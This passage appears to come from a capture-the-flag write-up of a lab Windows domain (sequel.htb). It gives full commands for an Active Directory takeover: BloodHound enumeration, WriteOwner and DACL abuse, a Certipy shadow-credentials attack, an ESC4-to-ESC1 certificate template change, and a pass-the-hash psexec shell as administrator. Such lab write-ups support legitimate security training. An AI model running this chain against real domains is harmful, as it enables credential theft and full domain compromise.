WindowsBuildLabEx : 17763.1.amd64fre.rs5_release.180914-1434
WindowsCurrentVersion : 6.3
WindowsEditionId : ServerStandard
WindowsInstallationType : Server
WindowsInstallDateFromRegistry : 6/8/2024 4:32:20 PM
WindowsProductId : 00429-00521-62775-AA352
WindowsProductName : Windows Server 2019 Standard
WindowsRegisteredOwner : Windows User
WindowsSystemRoot : C:\Windows
WindowsVersion : 1809Also it seems AD CS is installed in the host.
Get-ADObject -Filter {objectClass -eq "certificationAuthority"} -SearchBase "CN=Public Key Services,CN=Services,CN=Configuration,DC=sequel,DC=htb"
DistinguishedName Name ObjectClass ObjectGUID
----------------- ---- ----------- ----------
CN=sequel-DC01-CA,CN=Certification Authorities,CN=Public Key Services,CN=Services,CN=Configuration,DC=sequel,DC=htb sequel-DC01-CA certificationAuthority 94fe122e-5619-48b2-b0f6-194fbd276cac
CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration,DC=sequel,DC=htb NTAuthCertificates certificationAuthority 3968134c-0918-4117-acfe-cb97bebaff43
CN=sequel-DC01-CA,CN=AIA,CN=Public Key Services,CN=Services,CN=Configuration,DC=sequel,DC=htb sequel-DC01-CA certificationAuthority 81cc117d-fd4e-4a56-82c0-92d9e0753b60Next step will be to perform an AD enumeration with BloodHound CE. Installation and configuration guide for this tool are available in Certified. In that case, we used BloodHound-Python as a remote data collector; however, in this case, since we have a shell in the system, we will use SharpHound local collector for the sake of testing different tools.
We need to use a SharpHound CE version developed for BloodHound CE, otherwise the data ingestion will fail. The appropriate version can be downloaded from the application GUI itself in Settings → Download Collectors.
Drop a copy of SharpHoundCE.exe in the host and collect the data.
> .\sharphoundCE.exe --collectionmethods all
2025-01-19T09:04:10.5455220-08:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-01-19T09:04:10.7330116-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2025-01-19T09:04:10.7642664-08:00|INFORMATION|Initializing SharpHound at 9:04 AM on 1/19/2025
2025-01-19T09:04:10.7955042-08:00|INFORMATION|Resolved current domain to sequel.htb
2025-01-19T09:04:18.7642682-08:00|INFORMATION|Loaded cache with stats: 62 ID to type mappings.
62 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2025-01-19T09:04:18.7955131-08:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2025-01-19T09:04:18.9053203-08:00|INFORMATION|Beginning LDAP search for sequel.htb
2025-01-19T09:04:18.9830057-08:00|INFORMATION|Beginning LDAP search for sequel.htb Configuration NC
2025-01-19T09:04:18.9986277-08:00|INFORMATION|Producer has finished, closing LDAP channel
2025-01-19T09:04:18.9986277-08:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-01-19T09:04:19.0299113-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for SEQUEL.HTB
2025-01-19T09:04:19.0299113-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for SEQUEL.HTB
2025-01-19T09:04:19.1861317-08:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for SEQUEL.HTB
2025-01-19T09:04:20.2642542-08:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2025-01-19T09:04:20.2955073-08:00|INFORMATION|Output channel closed, waiting for output task to complete
2025-01-19T09:04:20.5767600-08:00|INFORMATION|Status: 348 objects finished (+348 348)/s -- Using 39 MB RAM
2025-01-19T09:04:20.5767600-08:00|INFORMATION|Enumeration finished in 00:00:01.6938162
2025-01-19T09:04:20.6705151-08:00|INFORMATION|Saving cache with stats: 62 ID to type mappings.
63 name to SID mappings.
1 machine sid mappings.
4 sid to domain mappings.
0 global catalog mappings.
2025-01-19T09:04:20.6861293-08:00|INFORMATION|SharpHound Enumeration Completed at 9:04 AM on 1/19/2025! Happy Graphing!Bring the ZIP to your BloodHoundCE and have a look at the AD, we see ryan has WriteOwner over the user ca_svc. If you click on the edge, the application itself tells how to abuse this.
Essentially, it is the same as did in Certified: first we take ownership of the group, then abuse our position to grant ourselves full control, and finally perform a shadow credential attack to get the victim's NT hash.
Let's begin by taking ownership of the group.
> python3 /usr/share/doc/python3-impacket/examples/owneredit.py -action write -new-owner ryan -target ca_svc 'sequel.htb/ryan:<password>'
Then abuse the ownership to grant ourselves full control by editing the DACL.
> python3 /usr/share/doc/python3-impacket/examples/dacledit.py -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'<password>'
Now we are in a position to perform a shadow credential attack and dump ca_svc user NT hash.
In summary, having full control over an account allows to modify the account's msDS-KeyCredentialLink LDAP attribute. This attribute usually stores public key credentials associated with an AD user or computer object. In this case we will store an alternate credential in the form of a certificate. Later, we will use this certificate to request a TGT on behalf of the user or to dump the NT hash.
This can be done with pyWhisker and PKINITtools (see Certified), or with Certipy, which provides an option to automate a shadow credentials attack in a single command and dump the hash.
> sudo ntpdate 10.10.11.51 && certipy shadow auto -u ryan@sequel.htb -p '<password>' -dc-ip 10.10.11.51 -ns 10.10.11.51 -target dc01.sequel.htb -account ca_svc
We cannot use this hash to have a WinRM shell as ca_svc, but we can use it to remotely find vulnerable templates with Certipy.
> certipy find -u ca_svc@sequel.htb -hashes <hey> -dc-ip 10.10.11.51 -vulnerable -stdout
There is a template vulnerable to ESC4, which basically means there are users with excessive permissions (i.e. full control) over the template. In other words, SEQUEL.HTB\Cert Publishers can do whatever they want with the template, including modifying it to make it vulnerable to ESC1.
> certipy template -username ca_svc@sequel.htb -hashes <hey> -template DunderMifflinAuthentication -save-old
The certificate template is now vulnerable to the ESC1 technique.
We can request a certificate based on the template and specify an arbitrary SAN with either the -upn or -dns parameters.
> certipy req -username ca_svc@sequel.htb -hashes <hey> -ca sequel-DC01-CA -target DC01.sequel.htb -template DunderMifflinAuthentication -upn administrator@sequel.htb -target 10.10.11.51
An with this certificate dump the administrator's NT hash.
> certipy auth -pfx ./administrator.pfx -dc-ip 10.10.11.51
The only thing that's left is to open a shell with the hash.
> python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes <hey>:<hey> sequel.htb/administrator@sequel.htb
You are root.
REFERENCES
https://i-tracing.com/blog/dacl-shadow-credentials/
https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf
Last updated